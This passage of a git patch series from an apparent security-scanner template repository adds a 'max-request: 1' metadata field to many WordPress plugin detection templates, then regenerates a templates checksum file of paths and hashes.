b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 755efd53fa..07c43b9d80 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/taxonomy-terms-order/ metadata: + max-request: 1 plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 0403bb4e72..83a849e11e 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/the-events-calendar/ metadata: + max-request: 1 plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml index cd2632ea05..c6100637d9 100644 --- a/http/technologies/wordpress/plugins/themeisle-companion.yaml +++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/themeisle-companion/ metadata: + max-request: 1 plugin_namespace: themeisle-companion wpscan: https://wpscan.com/plugin/themeisle-companion tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index b5f8b822c7..1f188b66c6 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/tinymce-advanced/ metadata: + max-request: 1 plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 85aaf7ff16..2c7b16cb44 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/translatepress-multilingual/ metadata: + max-request: 1 plugin_namespace: translatepress-multilingual wpscan: https://wpscan.com/plugin/translatepress-multilingual tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 0af322b728..9d6afa8d3f 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ metadata: + max-request: 1 plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index b7ad16e281..48481fde3b 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/under-construction-page/ metadata: + max-request: 1 plugin_namespace: under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 10fd071b0b..b34d196268 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/updraftplus/ metadata: + max-request: 1 plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index 401b0e479f..abec174ec3 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/use-any-font/ metadata: + max-request: 1 plugin_namespace: use-any-font wpscan: https://wpscan.com/plugin/use-any-font tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 6f95506748..e088ac07a6 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/user-role-editor/ metadata: + max-request: 1 plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 4404f87aab..8b163200bf 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/velvet-blues-update-urls/ metadata: + max-request: 1 plugin_namespace: velvet-blues-update-urls wpscan: https://wpscan.com/plugin/velvet-blues-update-urls tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8995434fce..2366a7dad7 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/w3-total-cache/ metadata: + max-request: 1 plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 8175806cb8..71448e61e8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/webp-converter-for-media/ metadata: + max-request: 1 plugin_namespace: webp-converter-for-media wpscan: https://wpscan.com/plugin/webp-converter-for-media tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index db82bc7f43..717554b89f 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/webp-express/ metadata: + max-request: 1 plugin_namespace: webp-express wpscan: https://wpscan.com/plugin/webp-express tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 03ddae57bc..fba5c8b09c 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/widget-importer-exporter/ metadata: + max-request: 1 plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d6449bb5bf..631202198e 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ metadata: + max-request: 1 plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 2d5fdf1779..cc953078eb 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ metadata: + max-request: 1 plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 6b5705e20d..97ce674116 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-variation-swatches/ metadata: + max-request: 1 plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index dbcdb64bad..6d05a6f058 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-paypal-express-checkout wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index fb9ea502ce..baf5af3bb5 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-stripe/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 1d41b4ec2c..54dce49b42 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 4fa6fc3ffe..5fae796fdd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-paypal-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 1c1c690fcd..22f812e2b8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ metadata: + max-request: 1 plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 4d6702d81a..c637006d26 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-services/ metadata: + max-request: 1 plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 42cb8bc409..e020507ccb 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce/ metadata: + max-request: 1 plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 55d6effbf5..c92903fd79 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordfence/ metadata: + max-request: 1 plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 6786cab703..c25b2c1c48 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordpress-importer/ metadata: + max-request: 1 plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 784ba22c8a..4d6dd14d25 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordpress-seo/ metadata: + max-request: 1 plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 72ff55e58a..7ca0870ed6 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/worker/ metadata: + max-request: 1 plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 8cfaa0f5a9..4f0d9be568 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-fastest-cache/ metadata: + max-request: 1 plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 85900a01a7..f3c481b824 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-file-manager/ metadata: + max-request: 1 plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index a7ccde0b49..ba214fd7ea 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-google-maps/ metadata: + max-request: 1 plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 422664a98c..8f5fe8d9a5 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-mail-smtp/ metadata: + max-request: 1 plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index f0af3a748a..0458b13354 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-maintenance-mode/ metadata: + max-request: 1 plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index f89f1a20b3..d570be07bf 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-migrate-db/ metadata: + max-request: 1 plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 01fb12d0ad..ee05e3add8 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-multibyte-patch/ metadata: + max-request: 1 plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 1773857e15..df2487955f 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-optimize/ metadata: + max-request: 1 plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index bcd1509c68..79ff01211c 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-pagenavi/ metadata: + max-request: 1 plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index c6aca20a60..23414b3d1d 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-reset/ metadata: + max-request: 1 plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 810fc82cde..0178c8e9fb 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-rollback/ metadata: + max-request: 1 plugin_namespace: wp-rollback wpscan: https://wpscan.com/plugin/wp-rollback tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 783d381ed8..a04ddc6003 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: + max-request: 1 plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 8bdc600063..2ead906817 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-smushit/ metadata: + max-request: 1 plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index ab61cc0338..dedd2e23b6 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-statistics/ metadata: + max-request: 1 plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 5f6fbc1f75..03cd7137a8 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-super-cache/ metadata: + max-request: 1 plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index d67150d038..a68d4b7d78 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-user-avatar/ metadata: + max-request: 1 plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index beeba7ca69..bf9dfc3ad8 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: + max-request: 1 plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index c225df7bfd..47911a86a5 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: + max-request: 1 plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaad04cb76..1c25b6f488 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpforms-lite/ metadata: + max-request: 1 plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index ff750a7d2a..b36317acd8 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wps-hide-login/ metadata: + max-request: 1 plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index f1e7595ccd..5eb35dd17e 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpvivid-backuprestore/ metadata: + max-request: 1 plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 4b2769ee46..ceb2b8d600 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: + max-request: 1 plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,wp-plugin,top-100,top-200 From 35ef1e4babbe144ba84d549a650ba83efaf644e0 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 2 Jul 2023 16:59:20 +0000 Subject: [PATCH 279/609] Auto Generated Templates Checksum [Sun Jul 2 16:59:19 UTC 2023] :robot: --- templates-checksum.txt | 404 ++++++++++++++++++++--------------------- 1 file changed, 202 insertions(+), 202 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index ae501fda8f..973f892a23 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2038,7 +2038,7 @@ http/cves/2022/CVE-2022-29007.yaml:0fe14f657d0adf9382642394f20cb0701ff94438 http/cves/2022/CVE-2022-29009.yaml:f98649cbe095ba75eae360dc35c6a27facb1345e http/cves/2022/CVE-2022-29014.yaml:ca07b794cfb3f776a5c8acf6b24ad0b831f525fa http/cves/2022/CVE-2022-29078.yaml:2730f1d0cdfe1fe04c64958723a712f905f18e10 -http/cves/2022/CVE-2022-29153.yaml:5c67e6ec67903460ca1f9fb9989d6099c15ab66d +http/cves/2022/CVE-2022-29153.yaml:ae6b3748a4d4e41d00fff03079d043ed69c2a583 http/cves/2022/CVE-2022-29272.yaml:b1c5b5532c3587820d711b0de0ff9e837e0c043c http/cves/2022/CVE-2022-29298.yaml:2948be67e89003ed602dc419efc87cb0a0e61804 http/cves/2022/CVE-2022-29299.yaml:4e06a2ba8ad58138a1def330d23c814fcb6abf63 @@ -5328,214 +5328,214 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114 -http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed -http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e +http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd 